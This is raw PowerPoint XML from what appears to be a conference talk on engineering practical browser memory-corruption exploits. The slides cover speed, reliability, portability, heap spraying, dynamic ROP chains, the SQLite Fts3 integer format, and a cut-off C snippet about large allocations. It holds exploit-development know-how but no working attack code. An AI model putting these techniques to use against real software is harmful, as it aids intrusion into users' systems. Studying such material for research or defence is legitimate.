        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1009003569"/>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4 elements for a Practical Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Speed</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Reliability</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Portability</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a:t>Imperceptibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="4376057"/>
            <a:ext cx="10515600"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> everything offset related, Build ROP chain dynamically, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="3343470"/>
            <a:ext cx="10515600"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Fix major issues until 80 ~ 90% reliable. Let Site Isolation take care of the rest</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3111171207"/>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4 elements for a Practical Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Speed</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Reliability</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Portability</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a:t>Imperceptibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="4376057"/>
            <a:ext cx="10515600"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> everything offset related, Build ROP chain dynamically, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="3343470"/>
            <a:ext cx="10515600"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Fix major issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>until 80 ~ 90% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reliable. Let Site Isolation take care of the rest</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="5388297"/>
            <a:ext cx="10515600"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Memory corruption bugs are generally imperceptible, unless the exploit crashes</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861898797"/>
      </p:ext>
    </p:extLst>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4 elements for a Practical Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4733795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Speed</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Reliability</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smtClean="0"/>
              <a:t>Portability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Imperceptibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="4376057"/>
            <a:ext cx="10515600"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> everything offset related, Build ROP chain dynamically, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="3343470"/>
            <a:ext cx="10515600"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Fix major issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>until 80 ~ 90% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reliable. Let Site Isolation take care of the rest</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="5388297"/>
            <a:ext cx="10515600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory corruption bugs are generally imperceptible, unless the exploit crashes</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="2310883"/>
            <a:ext cx="10515600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap spray is an essential requirement. Impossible to improve speed…?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36416952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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475861" y="3281200"/>
            <a:ext cx="11215396" cy="1458751"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>11110001001000000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469363" y="4553331"/>
            <a:ext cx="3461657" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Binary</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200852954"/>
      </p:ext>
    </p:extLst>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Improving speed</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344815" y="1"/>
            <a:ext cx="5847185"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6512768" y="289239"/>
            <a:ext cx="5587481" cy="6247864"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0x80000000;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
